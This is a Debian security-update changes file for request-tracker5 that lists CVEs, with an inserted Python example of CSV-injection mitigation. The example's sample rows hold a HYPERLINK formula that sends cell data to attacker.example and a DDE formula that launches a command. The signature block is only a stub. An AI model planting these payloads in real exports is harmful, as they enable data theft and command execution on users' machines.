-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 01 Jun 2026 13:10:39 +1200
Source: request-tracker5
Architecture: source
Version: 5.0.7+dfsg-4+deb13u3
Distribution: trixie-security
Urgency: high
Maintainer: Andrew Ruthven <andrew@etc.gen.nz>
Changed-By: Andrew Ruthven <andrew@etc.gen.nz>
Changes:
 request-tracker5 (5.0.7+dfsg-4+deb13u3) trixie-security; urgency=high
 .
   * Include missing default configuration items for security vulnerability
     fixes included in 5.0.7+dfsg-3. Namely: RestrictLinkDomains and Cipher
     in %SMIME.
   * Apply upstream patch which fixes several security vulnerabilities:
     - [CVE-2026-6841] Reflected cross-site scripting via the search "Page" URL
       parameter.
     - [CVE-2026-41073] Spreadsheet (CSV/formula) injection via ticket values
       that are exported to a spreadsheet from search results. User-controlled
       data is not sanitized before being written to the output file, which can
       cause spreadsheet applications such as Microsoft Excel to interpret
       crafted values as formulas or macros when the file is opened.
     - [CVE-2026-41075] SQL injection via the entry_aggregator parameter in JSON
       search. An authenticated user can craft input that is incorporated into
       database queries without proper validation, potentially allowing them to
       read or modify data in the RT database.
     - [CVE-2026-41076] LDAP authentication bypass when RT is configured to
       authenticate users against an LDAP or Active Directory server. Under
       certain LDAP server configurations, an attacker may be able to
       authenticate as any LDAP-backed RT user without supplying valid
       credentials.
     - [CVE-2026-44229] Cross-site scripting via uploaded content that is served
       inline rather than as an attachment.
     - [CVE-2026-44230] Reflected cross-site scripting on search-results chart
       pages.
     - [CVE-2026-44231] Privilege escalation and information disclosure via the
       REST 2.0 user collection endpoint. A Privileged RT user can obtain
       authentication credentials belonging to other users, including
       administrators, and use those credentials to read data via RT's RSS and
       iCal feed endpoints. The same request that exposes the credentials also
       rotates them, which invalidates previously-distributed feed URLs across
       the instance.
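The CVE-2026-41073 entry above describes the class of bug (ticket values written verbatim into a spreadsheet export, then evaluated as formulas by Excel or LibreOffice) but not the fix. The following is an added illustration in Python, not RT's code and not the upstream patch: it shows the vulnerable export pattern beside a hardened one, plus a scanner that flags formula-like cells in an export produced before the fix was deployed. The ticket rows, field names and the neutralisation rule (a leading apostrophe on cells starting with `=`, `+`, `-`, `@`, tab or carriage return, following the OWASP CSV-injection guidance) are assumptions made for the example.

```python
"""Spreadsheet (CSV) formula injection: vulnerable export beside a hardened one.

Added example, not RT code and not the upstream patch. SAMPLE_TICKETS below is
constructed sample data.
"""
import csv
import io

# Characters that Excel and LibreOffice treat as the start of a formula when
# they sit at the beginning of a cell. Tab and carriage return are included
# because a cell such as "\t=1+1" is still evaluated once the leading
# whitespace is discarded. (Assumption: this is the general OWASP-style
# mitigation, not what RT's patch does.)
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return a string that spreadsheet applications will treat as text."""
    if value is None:
        return ""
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        # A leading apostrophe makes the cell a literal string. Quoting the CSV
        # field is not enough on its own: the quotes are stripped before the
        # spreadsheet decides whether the cell is a formula.
        return "'" + text
    return text


def export_csv_vulnerable(rows, fieldnames) -> str:
    """The 'before' pattern: user-controlled ticket values written verbatim."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: row.get(k, "") for k in fieldnames})
    return buf.getvalue()


def export_csv_hardened(rows, fieldnames) -> str:
    """Same export with every cell passed through neutralize_cell()."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Scan an existing export and report cells a spreadsheet would evaluate.

    Returns (row_number, column_name, value) tuples; row 1 is the first data
    row below the header. Handy for triaging exports made before the fix.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for n, row in enumerate(reader, start=1):
        for col, val in row.items():
            if val and val.startswith(FORMULA_TRIGGERS):
                hits.append((n, col, val))
    return hits


# Constructed sample rows: one benign ticket and two whose subject/requestor
# fields carry the kind of value a requestor can submit by mail or web form.
SAMPLE_TICKETS = [
    {"id": 101, "Subject": "Printer on floor 3 is jammed",
     "Requestor": "alice@example.org"},
    {"id": 102, "Subject": '=HYPERLINK("http://attacker.example/?"&A1,"open")',
     "Requestor": "mallory@example.org"},
    {"id": 103, "Subject": "\t=cmd|' /C calc'!A0", "Requestor": "-1+1"},
]
FIELDS = ["id", "Subject", "Requestor"]


if __name__ == "__main__":
    unsafe = export_csv_vulnerable(SAMPLE_TICKETS, FIELDS)
    print("cells a spreadsheet would evaluate in the unsafe export:")
    for hit in find_formula_cells(unsafe):
        print("  ", hit)
    print("\nhardened export:\n" + export_csv_hardened(SAMPLE_TICKETS, FIELDS))
```

The trade-off of this mitigation is visible in the third sample row: a legitimate value such as a negative number or a phone number with a leading `+` also gets the apostrophe and is exported as text. Where that matters, apply the rule only to columns that are free-form user input rather than to every cell.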
Checksums-Sha1:
6186d5d0ff42c2897ce5590ebd407e3b75c31d92 6044 request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
3a56fb5d1f787d3f4b957003a3851cffcc44bde0 137108 request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
655f651e7cd57480b67401572780a40ed290cfdd 25034 request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
Checksums-Sha256:
5bad08a8208c96a196add245d58f2ccef116d33cca13cb7981161ecf5219a05c 6044 request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
ac6a18c81fab5c044f6649780fd4883705cd71edc7340a3a60128a1704a62095 137108 request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
263f00f84f846d10bdac5646429a0b8fcdd88557c0997954dc7b1a1aedbfee26 25034 request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
Files:
c74292d0e9251a226184685b8f437269 6044 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
44420d134af2f050fd025bbf4da073f6 137108 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
95c31e7d4e33339b68ee04530bd3030d 25034 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
=6op4
-----END PGP SIGNATURE-----